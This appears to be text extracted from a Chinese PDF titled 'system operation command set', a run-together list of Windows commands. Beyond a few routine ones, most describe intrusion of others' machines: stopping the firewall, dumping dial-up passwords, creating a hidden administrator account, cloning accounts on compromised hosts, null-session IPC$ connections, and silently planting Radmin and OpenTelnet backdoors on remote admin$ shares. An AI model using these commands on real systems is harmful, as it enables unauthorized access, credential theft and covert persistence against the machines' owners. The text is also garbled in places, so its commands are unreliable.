系统操作命令集.pdf

net share d:\web=e:\web /grant:zk0898,change 控制面版：运行:control 计算机管理：command MMC 结束XP 防火墙进程:net stop sharedaccess 查看ADSL 帐号密码的代码:dialupass /allusers /stext c:\pass.txt 启动3389 服务：net start TermService 关闭所有防火墙的代码:cmd.exe /c net stop sharedaccess iis 命令重启:iisreset /reboot 用CMD 命令实现路由跟踪:tracert 域名(如：) 结束进程：NET SHARE 查看版本：ver 查看中端(服务）：net start 查看文件：dir 查看3389 ： 加用户：c:\winnt\system32net user adminserver$ admin /add 提权限：net localgroup administrators adminserver$ /add 2180 查看用户net user 远程连接到主机CMD 命令：telnet 主机IP 踢人：logoff ID 查看当前人：query user 打开telnet:net start telnet telnet 连接工具：OpenTelnet 删除共享： net share e123=e:\ 删除共享： net share c$ /del 启用GUEST ：net user guest /active:yes 为GUEST 设密码：net user guest 888888 提升到管理员：net localgroup Administrators guest /add 超级用户隐藏器:c:\door adminserver$:admin 克隆帐号：ca \\ IP 你建立的帐号 密码 肉机默认帐号 密码 ca \\ adminserver$ admin adminserver admin 完全禁止系统模认工享 [HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\ Explorer\MyComputer \ NameSpace\ DelegateFolders\{59031a47-3f72-44a7-89c5-5595fe6b30ee}] 3389 替换服务 中修改[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] c:\winnt\system32\copy termsrv.exe service.exe c:\winnt\system32\cd.. c:\winnt\sc \\ config Alerter binpath= c:\winnt\system32\service.exe 端口转向：f:\web\ftp.exe c:\fpipe.exe -v -l 开放的端口 -r 要转向的端口 ip 使用空口令连接: net use \\对方IP\ipc$ /user:administrator (在上传文件的目录下)远程复制文件: c:\radminnet use \\a-01\ipc$ 12345 /user:administrator c:\ramdincopy r_server.exe \\a-01\admin$\system32 c:\ramdincopy radmin.reg \\a-01\admin$\sytem32 在对方CMD 下： c:\winnt\system32\regedit /s radmin.reg c:\winnt\system32\r_server.exe /install /silenec net start r_server copy r_server.exe \\对方IP\admin$\system32 c:\opentelnet.exe \\ IP ADMINISTRATOR 0 90 copy 文件名 \\ IP\admin$\system32 进入对方CMD: c:\opentelnet.exe \\ Ip administrator 0 90 登陆CMD: c:\telnet IP 90 安装RADMIN: c:\winnt\system32\ r_server /in